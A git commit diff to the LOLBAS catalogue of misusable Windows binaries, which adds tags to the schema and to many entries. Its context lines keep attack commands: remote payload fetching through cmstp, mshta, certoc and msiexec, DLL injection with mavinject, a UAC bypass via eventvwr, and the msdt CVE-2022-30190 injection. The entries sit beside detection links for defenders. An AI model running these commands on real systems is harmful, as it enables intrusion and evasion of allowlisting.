Adding tags (closes #9, #318) (#362)

* Adding various tags as a first iteration * Adding quotes * Adding 'Custom Format' properly * Updating to key:value pairs * Update template
2024-10-22 16:49:11 +02:00 · 2024-04-03 16:53:36 +01:00 · 2024-04-03 16:53:36 +01:00 · ebbf08ec4d
commit ebbf08ec4d
parent a945bac6be
65 changed files with 229 additions and 66 deletions
--- a/.github/workflows/gh-pages.yml
+++ b/.github/workflows/gh-pages.yml
@ -20,6 +20,7 @@ jobs:
          mv yml/OSBinaries yml/Binaries
          mv yml/OSLibraries yml/Libraries
          mv yml/OSScripts yml/Scripts
          rm -r yml/HonorableMentions
      - name: Deploy to LOLBAS-Project.github.io repo
        uses: peaceiris/actions-gh-pages@v3
--- a/YML-Schema.yml
+++ b/YML-Schema.yml
@ -57,6 +57,14 @@ mapping:
          "OperatingSystem":
            type: str
            required: true
          "Tags":
            type: seq
            sequence:
              - type: map
                mapping:
                  regex;(^[A-Z]):
                    type: str
            required: false
  "Full_Path":
    type: seq
    required: true
--- a/YML-Template.yml
+++ b/YML-Template.yml
@ -13,6 +13,8 @@ Commands:
    Privileges: Required privs
    MitreID: T1055
    OperatingSystem: Windows 10 1803, Windows 10 1703
    Tags:
      - Key1: Value1  # Optional field for one or more tags
  - Command: The second command
    Description: Description of the second command
    Usecase: A description of the usecase
--- a/yml/OSBinaries/AppInstaller.yml
+++ b/yml/OSBinaries/AppInstaller.yml
@ -5,12 +5,14 @@ Author: 'Wade Hickey'
 Created: 2020-12-02
 Commands:
  - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
-    Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>
+    Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache.
    Usecase: Download file from Internet
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Download: INetCache
 Full_Path:
  - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
 Detection:
--- a/yml/OSBinaries/Certoc.yml
+++ b/yml/OSBinaries/Certoc.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows Server 2022
    Tags:
      - Execute: DLL
  - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
    Description: Downloads text formatted files
    Usecase: Download scripts, webshells etc.
@ -21,8 +23,6 @@ Commands:
 Full_Path:
  - Path: c:\windows\system32\certoc.exe
  - Path: c:\windows\syswow64\certoc.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml
  - IOC: Process creation with given parameter
--- a/yml/OSBinaries/Cmstp.yml
+++ b/yml/OSBinaries/Cmstp.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218.003
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Input: INF
  - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
    Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
    Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1218.003
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
      - Input: INF
 Full_Path:
  - Path: C:\Windows\System32\cmstp.exe
  - Path: C:\Windows\SysWOW64\cmstp.exe
--- a/yml/OSBinaries/ConfigSecurityPolicy.yml
+++ b/yml/OSBinaries/ConfigSecurityPolicy.yml
@ -12,12 +12,14 @@ Commands:
    MitreID: T1567
    OperatingSystem: Windows 10
  - Command: ConfigSecurityPolicy.exe https://example.com/payload
-    Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+    Description: It will download a remote payload and place it in INetCache.
    Usecase: Downloads payload from remote server
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Download: INetCache
 Full_Path:
  - Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
  - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
--- a/yml/OSBinaries/Control.yml
+++ b/yml/OSBinaries/Control.yml
@ -11,11 +11,11 @@ Commands:
    Privileges: User
    MitreID: T1218.002
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: C:\Windows\System32\control.exe
  - Path: C:\Windows\SysWOW64\control.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml
--- a/yml/OSBinaries/Cscript.yml
+++ b/yml/OSBinaries/Cscript.yml
@ -11,11 +11,11 @@ Commands:
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: WSH
 Full_Path:
  - Path: C:\Windows\System32\cscript.exe
  - Path: C:\Windows\SysWOW64\cscript.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml
--- a/yml/OSBinaries/Diantz.yml
+++ b/yml/OSBinaries/Diantz.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
    Tags:
      - Type: Compression
  - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
    Description: Download and compress a remote file and store it in a cab file on local machine.
    Usecase: Download and compress into a cab file.
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
    Tags:
      - Type: Compression
 Full_Path:
  - Path: c:\windows\system32\diantz.exe
  - Path: c:\windows\syswow64\diantz.exe
--- a/yml/OSBinaries/Dnscmd.yml
+++ b/yml/OSBinaries/Dnscmd.yml
@ -11,11 +11,11 @@ Commands:
    Privileges: DNS admin
    MitreID: T1543.003
    OperatingSystem: Windows server
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: C:\Windows\System32\Dnscmd.exe
  - Path: C:\Windows\SysWOW64\Dnscmd.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml
  - IOC: Dnscmd.exe loading dll from UNC/arbitrary path
--- a/yml/OSBinaries/Eventvwr.yml
+++ b/yml/OSBinaries/Eventvwr.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1548.002
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
      - Application: GUI
  - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
    Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
    Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
@ -18,6 +20,8 @@ Commands:
    Privileges: Administrator
    MitreID: T1548.002
    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
      - Application: GUI
 Full_Path:
  - Path: C:\Windows\System32\eventvwr.exe
  - Path: C:\Windows\SysWOW64\eventvwr.exe
--- a/yml/OSBinaries/Expand.yml
+++ b/yml/OSBinaries/Expand.yml
@ -28,8 +28,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\Expand.exe
  - Path: C:\Windows\SysWOW64\Expand.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
--- a/yml/OSBinaries/Extexport.yml
+++ b/yml/OSBinaries/Extexport.yml
@ -11,11 +11,11 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: C:\Program Files\Internet Explorer\Extexport.exe
  - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml
  - IOC: Extexport.exe loads dll and is execute from other folder the original path
--- a/yml/OSBinaries/Extrac32.yml
+++ b/yml/OSBinaries/Extrac32.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
  - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
    Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
    Usecase: Extract data from cab file and hide it in an alternate data stream.
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
  - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
    Description: Copy the source file to the destination file and overwrite it.
    Usecase: Download file from UNC/WEBDav
--- a/yml/OSBinaries/IMEWDBLD.yml
+++ b/yml/OSBinaries/IMEWDBLD.yml
@ -5,12 +5,14 @@ Author: 'Wade Hickey'
 Created: 2020-03-05
 Commands:
  - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
-    Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
+    Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache.
    Usecase: Download file from Internet
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Download: INetCache
 Full_Path:
  - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
 Detection:
--- a/yml/OSBinaries/Installutil.yml
+++ b/yml/OSBinaries/Installutil.yml
@ -11,6 +11,9 @@ Commands:
    Privileges: User
    MitreID: T1218.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
      - Input: Custom Format
  - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
    Description: Execute the target .NET DLL or EXE.
    Usecase: Use to execute code and bypass application whitelisting
@ -18,13 +21,18 @@ Commands:
    Privileges: User
    MitreID: T1218.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
      - Input: Custom Format
  - Command: InstallUtil.exe https://example.com/payload
-    Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+    Description: It will download a remote payload and place it in INetCache.
    Usecase: Downloads payload from remote server
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Download: INetCache
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
--- a/yml/OSBinaries/Jsc.yml
+++ b/yml/OSBinaries/Jsc.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: WSH
  - Command: jsc.exe /t:library Library.js
    Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
    Usecase: Compile attacker code on system. Bypass defensive counter measures.
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: WSH
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
--- a/yml/OSBinaries/Makecab.yml
+++ b/yml/OSBinaries/Makecab.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
  - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
    Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
    Usecase: Hide data compressed into an alternate data stream
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
  - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
    Description: Download and compresses the target file and stores it in the target file.
    Usecase: Download file and compress into a cab file
@ -25,11 +29,11 @@ Commands:
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
 Full_Path:
  - Path: C:\Windows\System32\makecab.exe
  - Path: C:\Windows\SysWOW64\makecab.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
--- a/yml/OSBinaries/Mavinject.yml
+++ b/yml/OSBinaries/Mavinject.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218.013
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
    Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
    Usecase: Inject dll file into running process
@ -18,11 +20,11 @@ Commands:
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: C:\Windows\System32\mavinject.exe
  - Path: C:\Windows\SysWOW64\mavinject.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml
  - IOC: mavinject.exe should not run unless APP-v is in use on the workstation
--- a/yml/OSBinaries/Msbuild.yml
+++ b/yml/OSBinaries/Msbuild.yml
@ -25,6 +25,8 @@ Commands:
    Privileges: User
    MitreID: T1127.001
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: msbuild.exe project.proj
    Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
    Usecase: Execute project file that contains XslTransformation tag parameters
@ -32,6 +34,8 @@ Commands:
    Privileges: User
    MitreID: T1127.001
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: WSH
  - Command: msbuild.exe @sample.rsp
    Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
    Usecase: Bypass command-line based detections
--- a/yml/OSBinaries/Msdt.yml
+++ b/yml/OSBinaries/Msdt.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Application: GUI
  - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
    Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
    Usecase: Execute code bypass Application whitelisting
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Application: GUI
  - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
    Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
    Usecase: Execute code bypass Application allowlisting
@ -25,6 +29,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Application: GUI
 Full_Path:
  - Path: C:\Windows\System32\Msdt.exe
  - Path: C:\Windows\SysWOW64\Msdt.exe
--- a/yml/OSBinaries/Mshta.yml
+++ b/yml/OSBinaries/Mshta.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218.005
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: WSH
  - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
    Description: Executes VBScript supplied as a command line argument.
    Usecase: Execute code
@ -32,13 +34,17 @@ Commands:
    Privileges: User
    MitreID: T1218.005
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
    Tags:
      - Execute: WSH
  - Command: mshta.exe https://example.com/payload
-    Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+    Description: It will download a remote payload and place it in INetCache.
    Usecase: Downloads payload from remote server
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Download: INetCache
 Full_Path:
  - Path: C:\Windows\System32\mshta.exe
  - Path: C:\Windows\SysWOW64\mshta.exe
--- a/yml/OSBinaries/Msiexec.yml
+++ b/yml/OSBinaries/Msiexec.yml
@ -25,6 +25,8 @@ Commands:
    Privileges: User
    MitreID: T1218.007
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: msiexec /z "C:\folder\evil.dll"
    Description: Calls DLLUnregisterServer to un-register the target DLL.
    Usecase: Execute dll files
@ -32,6 +34,8 @@ Commands:
    Privileges: User
    MitreID: T1218.007
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
    Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input.
    Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server
@ -42,8 +46,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\msiexec.exe
  - Path: C:\Windows\SysWOW64\msiexec.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml
--- a/yml/OSBinaries/Netsh.yml
+++ b/yml/OSBinaries/Netsh.yml
@ -11,11 +11,11 @@ Commands:
    Privileges: Admin
    MitreID: T1546.007
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: C:\WINDOWS\System32\Netsh.exe
  - Path: C:\WINDOWS\SysWOW64\Netsh.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml
  - Splunk: https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/processes_launching_netsh.yml
--- a/yml/OSBinaries/Odbcconf.yml
+++ b/yml/OSBinaries/Odbcconf.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218.008
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: |
      odbcconf INSTALLDRIVER "lolbas-project|Driver=c:\test\test.dll|APILevel=2"
      odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project"
@ -20,6 +22,8 @@ Commands:
    Privileges: User
    MitreID: T1218.008
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: odbcconf -f file.rsp
    Description: Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file.
    Usecase: Execute dll file using technique that can evade defensive counter measures
--- a/yml/OSBinaries/OfflineScannerShell.yml
+++ b/yml/OSBinaries/OfflineScannerShell.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: Administrator
    MitreID: T1218
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe
 Detection:
--- a/yml/OSBinaries/Pcalua.yml
+++ b/yml/OSBinaries/Pcalua.yml
@ -18,6 +18,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
      - Execute: DLL
  - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
    Description: Open the target .CPL file with the Program Compatibility Assistant.
    Usecase: Execution of CPL files
@ -27,8 +29,6 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
  - Path: C:\Windows\System32\pcalua.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml
 Resources:
--- a/yml/OSBinaries/Presentationhost.yml
+++ b/yml/OSBinaries/Presentationhost.yml
@ -12,12 +12,14 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: Presentationhost.exe https://example.com/payload
-    Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+    Description: It will download a remote payload and place it in INetCache.
    Usecase: Downloads payload from remote server
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Download: INetCache
 Full_Path:
  - Path: C:\Windows\System32\Presentationhost.exe
  - Path: C:\Windows\SysWOW64\Presentationhost.exe
--- a/yml/OSBinaries/PrintBrm.yml
+++ b/yml/OSBinaries/PrintBrm.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
  - Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
    Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
    Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
 Full_Path:
  - Path: C:\Windows\System32\spool\tools\PrintBrm.exe
 Detection:
--- a/yml/OSBinaries/Rasautou.yml
+++ b/yml/OSBinaries/Rasautou.yml
@ -11,10 +11,10 @@ Commands:
    Privileges: User, Administrator in Windows 8
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: C:\Windows\System32\rasautou.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml
  - IOC: rasautou.exe command line containing -d and -p
--- a/yml/OSBinaries/Regasm.yml
+++ b/yml/OSBinaries/Regasm.yml
@ -11,6 +11,9 @@ Commands:
    Privileges: Local Admin
    MitreID: T1218.009
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
      - Input: Custom Format
  - Command: regasm.exe /U AllTheThingsx64.dll
    Description: Loads the target .DLL file and executes the UnRegisterClass function.
    Usecase: Execute code and bypass Application whitelisting
@ -18,13 +21,14 @@ Commands:
    Privileges: User
    MitreID: T1218.009
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
      - Input: Custom Format
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml
--- a/yml/OSBinaries/Register-cimprovider.yml
+++ b/yml/OSBinaries/Register-cimprovider.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: C:\Windows\System32\Register-cimprovider.exe
  - Path: C:\Windows\SysWOW64\Register-cimprovider.exe
--- a/yml/OSBinaries/Regsvcs.yml
+++ b/yml/OSBinaries/Regsvcs.yml
@ -11,6 +11,9 @@ Commands:
    Privileges: User
    MitreID: T1218.009
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
      - Input: Custom Format
  - Command: regsvcs.exe AllTheThingsx64.dll
    Description: Loads the target .DLL file and executes the RegisterClass function.
    Usecase: Execute dll file and bypass Application whitelisting
@ -18,11 +21,12 @@ Commands:
    Privileges: Local Admin
    MitreID: T1218.009
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
      - Input: Custom Format
 Full_Path:
  - Path: c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe
